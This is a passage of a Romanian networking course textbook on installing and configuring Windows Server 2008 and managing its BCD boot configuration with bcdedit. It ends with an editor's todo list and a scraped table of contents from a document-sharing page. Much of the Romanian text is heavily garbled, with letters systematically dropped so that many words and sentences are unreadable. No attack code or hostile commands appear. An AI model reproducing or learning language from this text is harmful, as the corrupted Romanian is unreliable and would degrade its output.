 utilizatori: u ă ul, lo aţia lo , d eptu ile pe a e le deţi
 politicile de securitate ce trebuie implementate
 esti a ea lăţi ii de a dă de la utilizato i la se e
 esti a ea lăţi ii de a dă e esa e î t e se e e da ă este azul
De asemenea, ca exemplu, un se e u ol de oute poate să afe teze u u ai

o figu aţia soft a e a se i iilo sale da şi ea ha d a e ai ulte plă i de eţea .
Server Core ep ezi tă o a ia ta edusă de i stala e a lui Windows Server 2008, fă ă
i te faţă g afi ă GUI şi a e foloseşte doa se i iile st i t e esa e olu ilo pe a e se e ul
le va îndeplini
12.1.3 Cerinţe hardware

Poate î od su p i zăto , e i ţele hardware pentru rularea lui Windows Server 2008 se
situează puţi su i elul elo e ute de Vista, fapt explicabil p i ga a e t e de edusă de
se i ii a ti e i ediat după i stala e şi, i eî ţeles, p i faptul ă toate olu ile u se i iile
afe e te pe a e o i stala e de se e le poate î depli i su t o plet opţio ale şi i a ti e de
la prima lansare. Evident, la polul o plet opus se află Vista, a e îşi „sufo ă p a ti
utilizato ii u se i ii de a e doa o i ă pa te di t e a eştia au e oie.
Ce i ţele hardware oficiale pentru diversele variante de Windows Server 2008 sunt
prezentate mai jos:
1
http://en.wikipedia.org/wiki/Computer_cluster
 Procesor:
o Minim: 1GHz
o Recomandat: 2 GHz
o Optim: 3GHz sau mai mult
P o eso I tel Ita iu pe t u a ia ta o espu zătoa e de Windows Server 2008

o
Memorie:
o Minim: 512 MB
o Recomandat: 1 GB
o Opti : GB pe t u i stala ea o pletă sau GB pe t u i stala ea Server Core
o Maxim (pe de iţi : GB a ia ta Standard) sau 64 GB (variantele Enterprise şi Datacenter)
o Ma i pe de iţi : GB a ia ta Standard) sau 2 TB (variantele Enterprise, Datacenter şi pe

sistemele Itanium)
“pațiu pe dis :
o Minim: 8 GB
o Recomandat: 40 GB (instala e o pletă sau GB Server Core)
o Opti : GB i stala e o pletă sau GB Server Core şi ai ult
12.1.4 Instalarea propriu-zisă

Î ele e u ează o fi e e plifi aţi paşii u ei i stală i tipi e:
1. După i t odu e ea dis ului de i stala e şi oot-area de pe a esta, a apă ea fe east a de
alege e a li ii, zo ei şi a tastatu ii. Cli pe next.
12-1
2. Clic pe Install now pe t u a î epe p o esul de i stala e. Tot ai i se o putea a esa şi

utilitarele de recuperare (Repair your computer).
3. Î a est stadiu se poate i t odu e heia de a ti a e. Da ă se do eşte doa testa ea p odusului
sau u se do eşte o i stala e defi iti ă, heia de a ti a e se poate o pleta ulte io i stală ii
402 | ‘ e ţ e l e L o a l e
sistemului.De asemenea, în acest az, t e uie de ifat â pul Automatically activate Windows
he I’ o li e .
4. Î o ti ua e t e uie sele tată a ia ta do ită de i stala e Standard sau Enterprise în varianta
MSDNAA)
12-2
5. Se va selecta tipul de instalare dorit (Full installation sau Server core)

6. “e a alege da ă i stala ea a e u ează să fie fă ută este su fo ă de upgrade sau nu. De
e a at faptul ă opţiu ea de upgrade u se a edea a ti ă de ât da ă s-a i iţiat p o edu a
de instalare dintr-o e siu e p e ede tă de Wi do s.
7. Da ă hard disk-ul este dete tat auto at, se a putea ea şi fo ata pa tiţia e esa ă pe t u
i stala e alătu i de elelalte pa tiţii . Da ă dis ul u este dete tat, el ai p o a il driver-ul
pentru controller nu este încorporat în Windows, caz în care acesta va putea fi instalat cu un
li pe „Load driver .
8. După pa u ge ea a esto paşi, Wi do s a o ti ua i stala ea fă ă a ai e e i fo aţii
suplimentare, iar la final va lansa sistemul nou instalat.
Ate ţie: Ca şi la e siu ile p e ede te de Wi do s, i stala ea a sup as ie o i e
bootloader ce nu a fost recunoscut (de exemplu Grub sau Lilo)
Activare: Varianta de Windows Server 2008 o ţi ută p i i te ediul M“DNAA poate

fu ţio a de zile fă ă a ti a e.
12-3
12.1.5 Configurări iniţiale

După te i a ea i stală ii se afişează fe east a de Initial configuration tasks. Multe dintre
opţiu ile dispo i ile ai i fă eau pa te di i fo aţiile i te edia e, e ute pe pa ursul
i stală ii, la e siu ile a te ioa e de Wi do s. Iată u s u t ezu at al lo :
 Setarea parolei de administrator: Î a est pu t, pa ola t e uie să fie deja setată, î ă de la
p i a i t a e î siste . “ hi a ea ei se poate fa e şi de ai i.
 Setarea fusului orar
 Co figurarea rețelei: Prin intermediul paginii Network connections din Control panel; pot fi
o figu ate ai ulte i te feţe de eţea.
 Nu e şi do e iu: Co figu a ea u ui u e pe t u siste ât şi spe ifi a ea u ui do e iu al
ă uia a esta să fie membru.
 Feedback: Co figu ă i pe t u Windows Update, Windows Error Reporting şi Customer
Experience Improvement Program CEIP . Ate ţie la o fo itatea a esto a u politi ile i te e
ale companiei, în cazul în care instalarea se face într-un mediu enterprise.
 A tualizări auto ate: Windows Update a t e ui să ai ă d eptul să a tualizeze siste ul atu i
când sunt disponibile patch-u i, î afa a azului î a e deţi eţi u siste de a age e t al
patch-u ilo . Ate ţie la o figu ă ile a e a putea auza esta ta ea auto ată a siste ului î
u a i stală ii de patch-uri.
 Adăugarea rolurilor: ‘olu ile ep ezi tă s opu ile î a e a fu ţio a se e ul şi, i pli it,
se i iile pe a e a esta le a fu iza. P i t e olu i se u ă ă DN“, DHCP, II“, firewall, etc.
 Adăugarea de ara teristi i features : I te faţa di Windows Server 2008 î lo uieşte e hea
i te faţă de u ită Add/Remove Windows Components de la Add/Remove Programs din
Control Panel, în versiunile anterioare de Windows. Printre atribute, se e u e ă: serviciul de
wireless, PowerShell, platfo a .NET . , i te faţa Aero Glass, etc.
404 | ‘ e ţ e l e L o a l e
 Activare Remote Desktop: Wi do s poate fi ad i ist at de la dista ţă, î od g afi , p i

intermediul serviciului de Remote Desktop.
 Configurare Windows Firewall: Permite activarea sau dezactivarea firewall-ului încorporat în
Windows Server 2008, adăuga ea de p og a e sau po tu i a e epţii şi alte opţiu i legate
st i t de o e iu ile e apa ţi siste ului, ase ă ăto firewall-ului din Windows XP. Cu alte
u i te, u eţi o figura de aici regulile de filtrare a pachetelor pentru un server ce
fu ţio ează a router/firewall, spre exemplu.
Setarea i iţială a parolei: Î od o al, Wi do s “e e o ligă seta ea pa olei de
administrator la prima intrare în sistem. Aceasta trebuie să ai ă el puţi a a te e şi să
o ţi ă el puţi t ei ele e te disti te di t e u ătoa ele: lite e a i, lite e i i, if e sau
se e de pu tuaţie.
După î hide ea fe est ei de Initial Configuration Tasks, este po ită auto at i te faţa
Server Manager. A esta se i te g ează u toate se i iile şi fa ilităţile siste ului, pe t u
e t aliza ea şi uşu a ea ad i ist ă ii.
Recuperarea parolei: Da ă se do eşte s hi a ea pa olei ad i ist ato ului folosi d Ct l-
Alt-Del şi alegâ d „Cha ge a pass o d , se a putea o se a u li k, su â pul de pa olă,
u it „C eate a pass o d eset disk a e este totodată legătu a sp e p o edu a „Fo gotte
Pass o d Wiza d , a esi ilă şi di Co t ol Pa el > C eate a pass o d eset disk. „Dis ul de
recuperare a parolei poate fi atât o dis hetă ât şi u sti k U“B şi poate fi folosit a o heie,
pe t u edo â di ea d eptu ilo de a es î siste î azul u ei pa ole uitate, hia da ă
a easta a fost s hi ată de la ea ea dis ului de e upe a e.
12.2 Anexa 2: Sistemul de boot în Windows Server 2008

Toate variantele de Windows Server, începând cu Windows NT, au folosit NT Loader
NTLD‘ î p eu ă u boot.ini pentru a controla procesul de boot-a e, p e u şi pe t u a
gestiona posibilitatea de boot-a e ultiplă. Î epâ d u Vista şi, de i, i luzâ d Windows
Server 2008, întregul sistem de boot a fost e o eput şi de u it BCD Boot Configuration
Data a e î lo uieşte NTLD‘ o plet p i fu ţio alitate. A u , î lo ul sto ă ii o figu aţiei
de boot într-u fişie te t, a boot.ini, BCD foloseşte u fişie i a e poate fi editat doa
folosind unelte specializate, ca BCDEdit.exe sau WMI (Windows Management
Instrumentation).
Î od i pli it şi u p e ăde e pe siste ele pe de iţi, BCD se găseşte î
%SystemDrive%\Boot\BCD, ca în output-ul de mai jos:
PS C:\> ls C:\Boot\BCD
Directory: Microsoft.PowerShell.Core\FileSystem::C:\Boot
Mode LastWriteTime Length Name

---- ------------- ------ ----
-a--- 7/27/2008 8:56 PM 28672 BCD
12-4: Lo ația fişierului BCD î tr-o instalare de Windows Server 2008 Standard
12-5: Boot Loader-ul din Windows Server 2008 şi Vista
Pentru sistemele de operare bazate pe EFI (Extensible Firmware Interface), dintre

siste ele pe de iţi, BCD este sto at î pa tiţia de siste EFI NV‘AM .
12.2.1 Modalităţi de interacţiune cu BCD

E istă pat u etode p i a e u ad i ist ato poate să odifi e pa a et ii sto aţi î
BCD:
 Applet-ul din Control Panel, u fle i ilitate edusă, da a e pe ite odifi a ea timeout-ului
boot loader-ului, a o di ii î a e su t afişate siste ele de ope a e dete tate, p e u şi alte
opţiu i de ază.
 MSConfig.exe poate fi folosit de asemenea, pent u a seta opţiu i de ază ale boot loader-
ului, da ofe ă şi opţiu i legate de de ug sau safe ode.
 BCDEdit.exe este u utilita î li ie de o a dă şi, totodată, el ai pute i di pu tul de
ede e al opţiu ilo şi al fle i ilităţii. Pu e la dispoziţia ad i ist atilo toate opţiu ile boot
loader-ului şi supo tă o fo ă de s ipti g.
 WMI: folosind WMI, un administrator poate folosi orice limbaj de scripting care suporta WMI
pe t u a efe tua s hi ă i asup a boot loader-ului. De ase e ea, i te faţa ofe ă o flexibilitate
foa te a e, deşi i te a ţiu ea se fa e ai difi il de ât î azul lui BCDEdit.exe.
12.2.1.1 BCD: Control Panel

O pa te di opţiu ile de ază ale boot loader-ului pot fi modificate din Control Panel.
Pe t u a a esa a este opţiu i, u aţi paşii:
1. Se a esează applet-ul System din Control Panel:
406 | ‘ e ţ e l e L o a l e
12-6: Control Panel - System
2. “e sele tează Advanced System Settings di e iul di pa tea stâ gă:
12-7: Control Panel - System Properties
3. În categoria Startup and Recovery, se alege Settings:

12-8: Control Panel - System Properties - Startup and Recover
12.2.1.2 BCD: MSConfig.exe

System Configuration este o i te faţă folosită, î ge e al, pe t u depista ea şi t ata ea
p o le elo e pot apă ea la po i ea Wi do s. P i t e altele, ai i pot fi odifi ate setă i
legate de modalitatea de pornire a Windows sau pot fi selectate serviciile ce vor fi pornite
automat.
12-9: I terfața M“Co fig “ ste Co figuratio
La subcategoria Boot se egăses u ătoa ele opţiu i ele a te pe t u odul î ae

Wi do s se la sează î e e uţie:
408 | ‘ e ţ e l e L o a l e
 Safe Boot:
o Minimal: Po eşte Wi do s î i te faţa g afi ă ulâ d doa u su set i i al de se i ii. Toate
se i iile de eţea su t deza ti ate.
o Alternate Shell: Po este Wi do s î p o ptul de o a dă cmd.exe. “etul de se i ii î ă ate
este, de ase e ea, i i al. Toate se i iile de eţea, p e u şi i te faţa g afi ă, su t deza ti ate.
o Active Directory Repair: Po eşte Wi do s î i te faţa g afi ă, î p eu ă u u set i i al de
se i ii şi Active Directory.
o Networking: Po este Wi do s î i te faţa g afi ă, a şi î odul i i al, da u supo t pe t u
serivi iile de eţea.
 No GUI Boot: Deza ti ează afişa ea e a ului de î ă a e splash screen) în timpul boot-ă ii.
 Boot Log: “to hează u ju al al p o esului de boot al sistemului în

%SystemRoot%\Ntbtlog.txt
Base Video: Po eşte Wi do s î odul i i al VGA. Driver-ele ideo î ă ate su t ele
sta da d VGA, î lo ul elo spe ifi e plă ii ideo i stalate î siste .
 OS Boot Information: Afişează u ele d i e elo şi fişie ele lo e su t î ă ate î ti pul
procesului de boot-are.
 Make All Boot Settings Permanent: Nu ţi e e ide ţa setă ilo s hi ate î System
Configuration, de i u se poate e e i la o figu aţia de ază sele tâ d Normal startup la
categoria General, i doa eadu â d fie a e seta e a ual la sta ea i iţială.
12.2.1.3 BCD: BCDEdit.exe

Pentru BCDEdit.exe, fii d u utilita de si e stătăto , el ai si plu od de a t e e î
e istă pa a et ii p i ipali ai săi este de a-l la sa î li ia de o a dă u pa a et ul /?
pentru a-i afişa opţiu ile de ajuto :
PS C:\Users\Administrator> bcdedit /?
BCDEDIT - Boot Configuration Data Store Editor
The Bcdedit.exe command-line tool modifies the boot configuration data store.
The boot configuration data store contains boot configuration parameters and
controls how the operating system is booted. These parameters were previously
in the Boot.ini file...
[...]
Commands that operate on a store
================================
/createstore Creates a new and empty boot configuration data store.
/export Exports the contents of the system store to a file. This file
can be used later to restore the state of the system store.
[...]
12-10: Fragment al comenzii bcdedit.exe /?
“e o se ă ă BCDEdit.exe a eptă o se ie destul de u e oasă de pa a et i, a e î

des ie ea di o a da de ai sus su t o side ate „ o e zi . Pe t u a o ţi e ajuto
supli e ta şi pa ti ula pe t u o i a e di t e a estea, se poate folosi o a da bcdedit /?
parametru, ca în exemplul de mai jos:
PS C:\Users\Administrator> bcdedit /? /enum
This command lists entries in a store. The /enum command is the default,
so running "bcdedit" without parameters is equivalent to running
"bcdedit /enum ACTIVE".
bcdedit [/store <filename>] /enum [<type> | <id>] [/v]
<filename> Specifies the store to be used. If this option is not
specified, the system store is used. For more information,
run "bcdedit /? store".
12-11: O ți erea de ajutor pe tru para etrul /e u
Una di t e ele ai si ple şi totodată utile o e zi e pot fi folosite î p eu ă u

BCDEdit.exe o ep ezi ă pa a et ul /enum:
PS C:\Users\Administrator> bcdedit /enum /v

Windows Boot Manager
--------------------
identifier {bootmgr}
device partition=C:
description Windows Boot Manager
[...]
timeout 30
Windows Legacy OS Loader

------------------------
identifier {ntldr}
device partition=D:
path \ntldr
description Earlier version of Windows
Windows Boot Loader
-------------------
identifier {247945e9-2c49-11dd-901e-f4acdce939da}
device partition=C:
path \Windows\system32\winload.exe
description Microsoft Windows Server 2008
locale en-US
inherit {bootloadersettings}
osdevice partition=C:
systemroot \Windows
[...]
12-12: Rezultatul comenzii BCDEdit.exe /enum /v
BCDEdit.exe /enum a e a efe t afişa ea de i fo aţii desp e Windows Boot Manager

p e u şi desp e toate elelalte boot loader-e ale altor sisteme de operare Windows.
În exemplul de mai sus s-a folosit un parametru suplimentar, /v, e esa pe t u a afişa
i detifi ato ii fie ă ui loader dete tat î siste e poate fi o figu at de ăt e BCD.
12.2.1.3.1 Exe plu de utilizare BCDEdit.exe: Modifi area se ve ţei de por ire
Î u ăto ul e e plu se a ată u se poate spe ifi a se e ţa de po ire astfel încât NT
Loader să po eas ă p i ul, u at de loader-ul cu identificatorul {247945e9-2c49-11dd-
901e-f4acdce939da} e o espu de i stală ii u e te de Windows Server 2008. Se poate
o side a faptul ă NT Loader-ul apa ţi e u ei i stală i de Wi do s XP, spre exemplu:
bcdedit /bootsequence {ntldr} {0f732d04-e6b2-11da-b631-b722247cd703}
E e plul u ăto de o st ează odalitatea de uta e sau de adăuga e a u ui siste de

operare cu identificatorul {0f732d04-e6b2-11da-b631-b722247cd703} astfel încât loader-ul
a estuia să fie p i ul a e a po i:
bcdedit /bootsequence {0f732d04-e6b2-11da-b631-b722247cd703} /addfirst
“i ila se p o edează şi pe t u situa ea u ui loader la sfâ şitul listei de p io ităţi:

bcdedit /bootsequence {0f732d04-e6b2-11da-b631-b722247cd703} /addlast
Eli i a ea u ei i t ă i pe t u u a u it loader al u ui siste de ope a e se ealizează

p i o a da de ai jos. “p e e e plu, da ă se do eşte e u ţa ea la u siste de ope a e
ai e hi, după şte ge ea fişie elo a estuia este e o a da il să i se eli i e i t a ea şi di
BCD:
bcdedit /bootsequence {ntldr} /remove
12.2.1.3.2 Exe plu de utilizare BCDEdit.exe: Modifi area ordi ii de afişare

În momentul în care pe un sistem sunt disponibile mai multe loader-e, este afişat u
meniu prin care utilizatorul poate alege pe a e să îl la seze î e e uţie. O di ea î a e a este
loader-e su t afişate poate fi odifi ată folosi d BCDEdit.exe cu parametrul /displayorder.
La fel a şi î azul pa a et ului /bootsequence, se poate spe ifi a e pli it o a u ită
ordi e de afişa e, se pot adăuga sau uta ite u i la î eputul sau sfâ şitul listei sau se pot
410 | ‘ e ţ e l e L o a l e
şte ge o plet ite u i di listă. De fapt, si ta a pe t u pa a et ul /displayorder este exact

a eeaşi a şi pe t u pa a et ul /bootsequence.
Spre exemplu, pentru a co figu a o di ea de afişa e a loader-elor astfel încât loader-ul
sistemului de operare cu identificatorul {0f732d04-e6b2-11da-b631-b722247cd703} să fie
afişat î ai tea NTLD‘-ului posi il al u ui Wi do s XP sau “e e se foloseşte o a da:
bcdedit /displayorder {0f732d04-e6b2-11da-b631-b722247cd703} {ntldr}
Î od si ila , adăuga ea NT Loader-ului la î eputul e iului se fa e î felul u ăto :

bcdedit /displayorder {ntldr} /addfirst
12.2.1.3.3 Exe plu de utilizare BCDEdit.exe: Modifi area ti pului de afişare a

meniului
Ti pul i pli it pe t u a e este afişat Boot manager-ul este de 30 de secunde, valoare ce
poate fi odifi ată p i pa a et ul /timeout a î e e plul u ăto , a e odifi ă ti pul
după a e Boot manager-ul sele tează loader-ul implicit la 5 secunde:
bcdedit /timeout 5
Parametrul /timeout permite setarea inclusiv pe valoarea de 0 (zero) secunde, caz în care
e iul u a a fi afişat ia loader-ul implicit va fi automat lansat.
12.2.1.3.4 Exemplu de utilizare BCDEdit.exe: Setarea loader-ului implicit

Pentru setarea loader-ului sele tat i pli it se foloseşte pa a et ul /default. Pe lâ gă
faptul ă a esta a fi sele tat i pli it, opţiu ea poate fi folosită î o ju ţie u aloa ea ze o
a parametrului /timeout pe t u a auza la sa ea i pli ită a loader-ului unui anumit sistem de
ope a e, fă ă a ai afişa e iul.
bcdedit /default {ntldr}
12.2.1.3.5 Exe plu de utilizare BCDEdit.exe: Salvarea şi î ăr area u ei

o figuraţii BCD
Este e o a da il a u ad i ist ato să sal eze o figu aţia BCD-ului pentru
eventualitatea unei situaţii î a e este e esa ă estau a ea ei. Î ai te de a fi i ple e tat
BCD, e a sufi ie tă ea ea u ei opii a fişie ului te t boot.ini. În cazul BCD-ului, fişie ul
a estuia este lo at şi a at a fii d folosit î pe a e ţă, eea e fa e i posi ilă opierea
sau suprascrierea sa. BCDEdit.exe supo tă, î să pa a et ii /export şi /import care fac
posi ilă sal a ea şi sup as ie ea o ţi utului fişie ului BCD. A ii pa a et i e esită doa
alea sp e fişie ul î a e a fi sal ată o figu aţia sau di a e a easta a fi î ă ată. Astfel
ă, pe t u sal a ea î fişie ul BCDbackup se poate folosi comanda:
bcdedit /export "D:\back\BCDbackup"
“i ila , pe t u î ă a ea o figu aţiei di fişie ul a te io , se foloseşte:

bcdedit /import "D:\back\BCDbackup"
Se reco a dă t e e ea î e istă şi a alto pa a et i fu da e tali pe t u utliza ea lui

BCDEdit.exe, ca /delete, /deletevalue, /copy şi /set. E pli ita ea a esto a depăşeşte,
totuşi, s opul a estei ă ţi, de i ap ofu da ea lo ă â e la latitudi ea itito ului.
Ate ţie! Î ă a ea u ei o figu aţii e alide poate du e la i posi ilitatea la să ii î
e e uţie a o i ă ui siste de ope a e i stalat.
Mai ulte i fo aţii efe itoa e la o eptele pe aza ă uia fu ţio ează BCD p e u şi
o do u e taţie î detaliu pe t u utilizarea lui BCDEdit.exe pot fi găsite î do u e tul de la
ad esa u ătoa e:
http://www.microsoft.com/whdc/system/platform/firmware/bcd.mspx
412 | ‘ e ţ e l e L o a l e
Reviewer’s todos:
- get rid of other todos
- format questions
- check headers (some don’t have styles or numbers)
- change headers to give necesarry spacing
- fix filenames, commands and addresses with z_text_comanda
- fix fucked up wrapping in some z_command_8 blocks
- if possible, review all English terms and apply z_text_italic
- fix invisible images and format them all with z_figura, including description
o also add space after description or space on the bottom of z_figura
- remove hyperlinks from e-mail addresses and web links
- fix nicio, niciun
- update all dynamic fields (references, cross-references...)
- de verificat NEAPARAT referintele!!!!!!

Curs Retelistica Automatic A

Încărcat de

Informații document

Drepturi de autor

Formate disponibile

Partajați acest document

Partajați sau inserați document

Opțiuni de partajare

Vi se pare util acest document?

Este necorespunzător acest conținut?

Drepturi de autor:

Formate disponibile

Curs Retelistica Automatic A

Încărcat de

Drepturi de autor:

Formate disponibile

0 Introducere în sisteme de operare .........................................................................................

2.3 ‘eţele lo ale i tuale .................................................................................................... 75

4.5 Co figu ă i la i el de oute î Li u ........................................................................ 141

7 DNS ..................................................................................................................................... 245

9.1.2 Hypertext Transfer Protocol .................................................................................. 311

0 Introducere în sisteme de operare

Ce se î vaţă di a est apitol?

0.1 Ce este un sistem de operare?

 nucleul sau kernel-ul: o po e ta de ază i i a siste ului de ope a e; o ţi e od a e a

0-1: Structura unui sistem de operare

Deși î lu ea siste elo de ope a e e istă o a e di e sitate, âte a siste e de ope a e

0.1.1 Ce înseamnă administrarea unui sistem de operare?

0.2 Noţiuni de bază pentru administrarea unui sistem de operare Linux

0.2.1 Componentele unui sistem GNU/Linux. Distribuţii

0.2.2 Sistemul de fișiere

/home/ Directoarele home ale utilizatorilor

0.2.3 Gestiunea utilizatorilor

“iste ele U u tu deza ti ează, de o i ei, utilizato ul root și e o a dă folosi ea

În sistemele Debian- ased, adăuga ea, espe ti ște ge ea u ui utilizato se ealizează p i

0.2.4 Drepturi pe sistemul de fișiere

E istă și u e hi ale t i a al d eptu ilo e p i at î o tal. Astfel, ele două fișie e de ai

Drept Efe t fișier Efect director

Fișie ul i a sau s ipt poate fi Directorul poate fi parcurs (poate fi parte a

“ hi a ea d eptu ilo pe u fișie se ealizează u ajuto ul o e zii chmod. Comanda are

“ hi a ea deţi ăto ului și g upului e deţi e fișie ul se ealizează u ajuto ul o e zii

0.2.5 Gestiunea pachetelor

0.2.6 Gestiunea pachetelor DEB

Adăuga ea u ui ou depozit î sea ă adăuga ea u ei oi li ii î fișie ul de o figu a e.

 afișa ea de i fo aţii desp e u fișie :

 i stala ea u ui pa het și a depe di ţelo sale :

Need to get 106kB of archives.

 dezinstalarea unui pachet:

 u ăţa ea a he-ului local de pachete:

 instalarea surselor unui pachet:

 afișa ea pa hetelo al ă o u e se pot i ește u o e p esie egulată:

 ăuta ea pa hetului e o ţi e u a u it fișie

0.2.7 Gestiunea serviciilor

a u it po t și ofe ă esu se sau i fo aţii u ui lie t. E e ple de astfel de servere/daemoni

Fiecare server/daemon poate avea și u e a is p op iu de po i e/ epo i e

Fii d detașate de u te i al de o t ol, i te a ţiu ea u se ii ile se ealizează p i

Diversele p o le e a e apa î azul u ei o figu ă i i alide, defe tuoase sau a alto

0.2.8 Shell scripting

0.2.8.1 Structura unui script shell

0.2.8.2 Redire tare și î lă țuirea comenzilor

Operatorul $ poate fi folosit, în mod generic, pentru expandare. Exceptând expandarea

0.2.8.4 Ci luri și i stru țiu i de de izie

0.2.8.5 Filtre de text

0.3 Introducere în Microsoft Windows Server 2008

0.3.1 Despre Microsoft Windows Server 2008

0.3.2 Windows PowerShell

0.3.2.1 Ce este Windows PowerShell?

0.3.2.2 Instalarea Windows PowerShell

Î afa ă de Windows Server 2008, PowerShell ai poate fi i stalat şi poate ula pe

0.3.2.3 La sarea î e e uție a Windows PowerShell

Odată i stalat, su t dispo i ile ai ulte etode de a-l porni:

0-3: Prompt-ul PowerShell, după la sare

Deoarece PowerShell ulează î t -o sesiu e de o solă, poate fi la sat şi o t olat şi de la

0.3.2.5 Comenzile PowerShell

Pentru a accesa ajutorul inclus în PowerShell, după po i ea a estuia se poate i t odu e

Fie a e o a dă i lude o se ţiu e de ajuto a e des ie o po ta e tul, si ta a şi

0-4: Ajutor pentru comanda Get-Help

Î legătu ă u la sa ea p og a elo e te e di PowerShell, trebuie avut în vedere faptul

Pentru cmd.exe, o a da si ila ă este:

De asemenea, în PowerShell, se poate folosi o pleta ea auto ată a o e zilo pe t u a